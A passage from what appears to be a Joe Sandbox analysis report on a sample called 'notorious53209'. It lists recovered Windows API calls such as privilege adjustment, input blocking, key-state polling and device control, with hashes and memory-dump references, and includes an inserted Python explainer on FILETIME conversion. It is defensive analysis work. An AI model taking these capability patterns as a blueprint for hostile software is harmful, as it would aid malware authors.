                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                  • String ID:
                                                  • API String ID: 1423138444-0
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008E40D1
                                                  • _memset.LIBCMT ref: 008E40F2
                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 008E4144
                                                  • CloseHandle.KERNEL32(00000000), ref: 008E414D
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                  • String ID:
                                                  • API String ID: 1157408455-0
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 008812D8
                                                  • GetClientRect.USER32(?,?), ref: 008BB84B
                                                  • GetCursorPos.USER32(?), ref: 008BB855
                                                  • ScreenToClient.USER32(?,?), ref: 008BB860
                                                  Similarity
                                                  • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                                  • String ID:
                                                  • API String ID: 1010295502-0
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008DEB19
                                                  Strings
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: ($|
                                                  • API String ID: 1659193697-1631851259
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 008EB5AE
                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008EB608
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008EB655
                                                  Similarity
                                                  • API ID: ErrorMode$DiskFreeSpace
                                                  • String ID:
                                                  • API String ID: 1682464887-0
                                                  APIs
                                                    • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                                    • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D8D0D
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8D3A
                                                  • GetLastError.KERNEL32 ref: 008D8D47
                                                  Similarity
                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1922334811-0
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008E4C2C
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008E4C43
                                                  • FreeSid.ADVAPI32(?), ref: 008E4C53
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                    • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                                  • GetParent.USER32(?), ref: 008BBA0A
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,008819B3,?,?,?,00000006,?), ref: 008BBA84
                                                  Similarity
                                                  • API ID: LongWindow$DialogNtdllParentProc_
                                                  • String ID:
                                                  • API String ID: 314495775-0
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 008EC966
                                                  • FindClose.KERNEL32(00000000), ref: 008EC996
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,008BBB8A,?,?,?), ref: 0090C8E1
                                                    • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0090C8C7
                                                  Similarity
                                                  • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                  • String ID:
                                                  • API String ID: 1273190321-0
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 0090CC51
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,008BBC66,?,?,?,?,?), ref: 0090CC7A
                                                  Similarity
                                                  • API ID: ClientDialogNtdllProc_Screen
                                                  • String ID:
                                                  • API String ID: 3420055661-0
                                                  • Opcode ID: f59375b1cc9e902b07d7ff005bde5f113691b2543be1959f04421b6ca8440f01
                                                  • Instruction ID: b00ae03b5b992b1f20ca40b37d05e9ea8164bbcda6f747a2c1c159bee2140fe7
                                                  • Opcode Fuzzy Hash: f59375b1cc9e902b07d7ff005bde5f113691b2543be1959f04421b6ca8440f01
                                                  • Instruction Fuzzy Hash: A7F01772410218FFEB148F85DC099AE7BB9EB48711F00416AF945A2161D3716A60EBA0
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,008F977D,?,0090FB84,?), ref: 008EA302
                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,008F977D,?,0090FB84,?), ref: 008EA314
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  • Opcode ID: 9eedebc25ad8a20a7a6018c5588ca44ce4bc17f195dd6440422146e508447ff1
                                                  • Instruction ID: 58dad320df8c992829107783b7b1fae109452f4aa695f4e3557c68832f7abefb
                                                  • Opcode Fuzzy Hash: 9eedebc25ad8a20a7a6018c5588ca44ce4bc17f195dd6440422146e508447ff1
                                                  • Instruction Fuzzy Hash: A9F0893555521DABDB209FA4CC88FEA776DFF09761F004155B918D6241D630A940CBA1
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0090CD74
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,008BBBE5,?,?,?,?), ref: 0090CDA2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogLongNtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 2065330234-0
                                                  • Opcode ID: 53746f7db9c26f8c902d828b401b33ea0158bbb737a68edc093437a829ed3385
                                                  • Instruction ID: ca0d02990bec06382ab4c575f02ef4ae1eefd1371263d0a56907e89430a4a2b3
                                                  • Opcode Fuzzy Hash: 53746f7db9c26f8c902d828b401b33ea0158bbb737a68edc093437a829ed3385
                                                  • Instruction Fuzzy Hash: C7E08671104258BFEB249F19DC19FBA3B58EB04750F408625F956E90E1C771D950E760
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8851), ref: 008D8728
                                                  • CloseHandle.KERNEL32(?), ref: 008D873A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  • Opcode ID: 067e9adc32b5f72e21c22d5cce1badcdd82d4a0ea61af238d7cf19f775ba0444
                                                  • Instruction ID: 57e5a85d86065507219fe6d0608132bf973328a944147874bce2b3c10ef337e8
                                                  • Opcode Fuzzy Hash: 067e9adc32b5f72e21c22d5cce1badcdd82d4a0ea61af238d7cf19f775ba0444
                                                  • Instruction Fuzzy Hash: F1E0BF75014610EEEB352B64EC09D7777A9FB04790B158529F466C0870DB615C90EB10
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008AA39A
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 008AA3A3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 51a495a159cab6803cbc68138de310a13b24e57c01020751a212f572f9660495
                                                  • Instruction ID: 9d347e03e5b74be8134238d89a5eea68c94aab785514f3cc65498f40629212e8
                                                  • Opcode Fuzzy Hash: 51a495a159cab6803cbc68138de310a13b24e57c01020751a212f572f9660495
                                                  • Instruction Fuzzy Hash: 10B0923106C208AFCA102B91EC19B883FA8EB45BF2F404020F60D84860CB625650AA91
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0ccb0add191aad47d08a6b88cb90e413dbe13d99f8674a70cf6e0f6813c02f1
                                                  • Instruction ID: 65987276f42022e0a750be6b3a5490b3a71675218fe40503b27c9ce94a88d9d9
                                                  • Opcode Fuzzy Hash: e0ccb0add191aad47d08a6b88cb90e413dbe13d99f8674a70cf6e0f6813c02f1
                                                  • Instruction Fuzzy Hash: 8D320321E6DF024DE7239674D832335A259EFB73D4F15D737E81AB5DA6EB2884839100
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c00e6746de87d5a6cb879f57804fe6d0d2ddef27b7eac2bb51802597a946444
                                                  • Instruction ID: ddc30f19c8aee4f91f0484c61645ba571ed60dc6cf1a6b31c22af6b96fe4dcc9
                                                  • Opcode Fuzzy Hash: 1c00e6746de87d5a6cb879f57804fe6d0d2ddef27b7eac2bb51802597a946444
                                                  • Instruction Fuzzy Hash: BAB1EF20E3AF514DD32396398831336BA5CAFBB2D5F51D71BFC2674E62EB2189839141
                                                  APIs
                                                  • __time64.LIBCMT ref: 008E8B25
                                                    • Part of subcall function 008A543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008E91F8,00000000,?,?,?,?,008E93A9,00000000,?), ref: 008A5443
                                                    • Part of subcall function 008A543A: __aulldiv.LIBCMT ref: 008A5463
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                  • String ID:
                                                  • API String ID: 2893107130-0
                                                  • Opcode ID: cd14655df31497f32a579f48a564704ad1e63a0bac76da6276a9dbf2ed838870
                                                  • Instruction ID: 208fc7cad908d448cc8ece66c0e46d7de1d0b5fc40cb080be009d51134e080d3
                                                  • Opcode Fuzzy Hash: cd14655df31497f32a579f48a564704ad1e63a0bac76da6276a9dbf2ed838870
                                                  • Instruction Fuzzy Hash: A221EB72539510CFC729CF25D441A52F3E1EBA5321B288E6CD0E9CF1D0CA74B945DB54
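The entry above lists __time64 with subcalls to GetSystemTimeAsFileTime and __aulldiv. That is the C runtime's time() on 32-bit x86: read the clock as a FILETIME (100 ns ticks since 1601-01-01 UTC), subtract the 1601-to-1970 bias, and divide by 10,000,000 using the CRT's 64-bit unsigned division helper, since the 32-bit processor has no native 64-bit divide. The following is an added example of that arithmetic, written for this page; it is not code from Joe Sandbox or recovered from the sample, and the helper names are the editor's own.

```python
"""FILETIME <-> Unix time: the arithmetic behind the __time64 routine listed
in this report (GetSystemTimeAsFileTime, then a 64-bit unsigned divide).

Added example for this page; not code from the report or from the sample.
Function names are the editor's choice.
"""
from datetime import datetime, timezone

# FILETIME counts 100 ns ticks since 1601-01-01 00:00:00 UTC; Unix time counts
# seconds since 1970-01-01.  134774 days separate the two epochs.
TICKS_PER_SECOND = 10_000_000
EPOCH_DIFF_SECONDS = 134_774 * 86_400                       # 11644473600
EPOCH_DIFF_TICKS = EPOCH_DIFF_SECONDS * TICKS_PER_SECOND    # 0x019DB1DED53E8000


def filetime_to_unix(low, high):
    """Combine the two DWORDs of a FILETIME and floor-divide to Unix seconds.

    This is the same computation __time64 performs after
    GetSystemTimeAsFileTime: bias subtraction, then the 64-bit divide that
    the x86 build routes through __aulldiv.
    """
    ticks = ((high & 0xFFFFFFFF) << 32) | (low & 0xFFFFFFFF)
    return (ticks - EPOCH_DIFF_TICKS) // TICKS_PER_SECOND


def unix_to_filetime(seconds):
    """Inverse: Unix seconds back to a (dwLowDateTime, dwHighDateTime) pair."""
    ticks = seconds * TICKS_PER_SECOND + EPOCH_DIFF_TICKS
    if not 0 <= ticks < (1 << 64):
        raise ValueError("value does not fit in a FILETIME")
    return ticks & 0xFFFFFFFF, ticks >> 32


def filetime_to_iso(low, high):
    """Human-readable UTC timestamp for a FILETIME pulled out of a dump or
    registry value; sub-second ticks are dropped, as __time64 drops them."""
    return datetime.fromtimestamp(filetime_to_unix(low, high),
                                  tz=timezone.utc).isoformat()


if __name__ == "__main__":
    # The Unix epoch expressed as a FILETIME is the well-known constant
    # 0x019DB1DED53E8000, split here into its low and high DWORDs.
    print(filetime_to_iso(0xD53E8000, 0x019DB1DE))
    print(unix_to_filetime(1_700_000_000))
```

The floor division matters for forensics: two FILETIME values up to 9,999,999 ticks apart map to the same second, so timestamps recovered from raw memory should be compared as ticks, not as the converted seconds.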
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 0090DB46
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogLongNtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 2065330234-0
                                                  • Opcode ID: 2f423947b962188b1add18aab2204694bf097b7aefe6b72fbcbe0a74a55c848a
                                                  • Instruction ID: 6c74fda7beda1ace6c40c0bedde7e8703081855176df302c4ae9ec55eadffee4
                                                  • Opcode Fuzzy Hash: 2f423947b962188b1add18aab2204694bf097b7aefe6b72fbcbe0a74a55c848a
                                                  • Instruction Fuzzy Hash: DE114071305225BFFB289EACDC05F7A3B5CEB86B20F204314F9519B5D2CBA49D1093A5
                                                  APIs
                                                    • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,008BBBA2,?,?,?,?,00000000,?), ref: 0090D740
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogLongNtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 2065330234-0
                                                  • Opcode ID: d4b663fcbdfccd31b07a5d1750130d937b7ea4a655ad4a13b7569bf357e90d51
                                                  • Instruction ID: 106e5a1a39bd9c1fd761b3f8f84c35c51640cc4d0fb4f128c2408bed8068eff7
                                                  • Opcode Fuzzy Hash: d4b663fcbdfccd31b07a5d1750130d937b7ea4a655ad4a13b7569bf357e90d51
                                                  • Instruction Fuzzy Hash: 20017079601114AFDF149F6DC885FFA3B99EF82324F040125F9151B1D2C331AC21D7A0
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                    • Part of subcall function 00882344: GetCursorPos.USER32(?), ref: 00882357
                                                    • Part of subcall function 00882344: ScreenToClient.USER32(009467B0,?), ref: 00882374
                                                    • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000001), ref: 00882399
                                                    • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000002), ref: 008823A7
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,008BBC4F,?,?,?,?,?,00000001,?), ref: 0090C272
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                  • String ID:
                                                  • API String ID: 2356834413-0
                                                  • Opcode ID: 19d57c95de83c3db75ca556cb4f47b310c4551de2901f7b6e9938409635b86dd
                                                  • Instruction ID: d2a5e4ef8aa5d9f04d4362a364b1789397149b94e2a6f8dc1172c7c3dbf9944a
                                                  • Opcode Fuzzy Hash: 19d57c95de83c3db75ca556cb4f47b310c4551de2901f7b6e9938409635b86dd
                                                  • Instruction Fuzzy Hash: 86F0E270204228AFCF14EF48CC15EBA3B91FB14B10F000015F9569B2A1CB75A820EBE1
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00881B04,?,?,?,?,?), ref: 008818E2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogLongNtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 2065330234-0
                                                  • Opcode ID: ee3288775f01a3c8608b20ea9b38380b772c498ebcacb4474303cc27617797a8
                                                  • Instruction ID: 778ef649dc42df9ceeac5bd71dc397723f242d8a44de99fa2d54ff093fd77a08
                                                  • Opcode Fuzzy Hash: ee3288775f01a3c8608b20ea9b38380b772c498ebcacb4474303cc27617797a8
                                                  • Instruction Fuzzy Hash: BCF0BE742102299FCF18EF08C855D7637E6FB42310F004529F8528B2A0DB31E950EB51
                                                  APIs
                                                  • BlockInput.USER32(00000001), ref: 008F4218
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BlockInput
                                                  • String ID:
                                                  • API String ID: 3456056419-0
